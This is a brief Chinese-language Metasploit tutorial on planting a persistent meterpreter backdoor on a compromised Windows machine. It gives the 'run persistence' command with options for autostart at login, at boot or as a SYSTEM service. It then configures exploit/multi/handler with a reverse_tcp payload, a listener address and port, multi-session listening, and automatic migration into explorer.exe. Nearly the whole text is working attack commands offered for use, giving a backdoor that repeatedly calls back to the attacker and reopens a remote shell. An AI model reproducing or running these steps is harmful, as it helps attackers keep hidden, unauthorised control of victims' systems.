meterpreter持久后門
背景:meterpreter好是好,但有個大問題,只要目標和本機連接斷開一次后就再也連不上了,需要再次用exploit打才行!!!
解決方案:在與目標設備的meterpreter會話中創建一個持久后門(此后門將重新生成一個木馬文件,並且該文件將周期性向服務端發送TCP請求)
具體步驟:
meterpreter > run persistence -U -i 5 -p 123 -r 192.168.1.71 =====>創建持久性后門
-A 自動啟動一個匹配的exploit / multi / handler來連接到代理
-L 如果未使用%TEMP%,則在目標主機中寫入有效負載的位置。
-P 有效負載使用,默認為windows / meterpreter / reverse_tcp。
-S 作為服務自動啟動該木馬(具有SYSTEM權限)
-T 要使用的備用可執行模板
-U 用戶登錄時自動啟動該木馬
-X 系統引導時自動啟動該木馬
-h 這個幫助菜單
-i 每次連接嘗試之間的時間間隔(秒)
-p 運行Metasploit的系統正在偵聽的端口
-r 運行Metasploit監聽連接的系統的IP
此時就可以放心的斷開與目標設備的session了,目標設備將周期性的向本機發送TCP請求,下次想連接此設備時只需做以下操作:
msfconsole
msf>use exploit/multi/handler ====>“handler”這個模塊專門就是來做被動監聽的,誘使目標執行任何木馬后都可以用這個模塊進行連接。(假如目標設備運行的meterpreter/reverse_tcp這個木馬,則在服務端handler也set這個木馬為payload即可)
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LHOST 192.168.1.71
msf>set LPORT 123
msf>set exitonsession false ===>這個如果不設置為false的話,只要建立了一個session后就不再繼續監聽,想要再連接其他session需要再次run。反之,如果設為false,建立了一個session后還會繼續監聽,無需run即可建立多個session。
msf>set AutoRunScript migrate -N explorer.exe ===>一般模塊都有AutoRunScript參數(需show advanced查看),此參數作用是:建立連接后自動執行后面的命令,此處即“migrate -N explorer.exe”
msf>run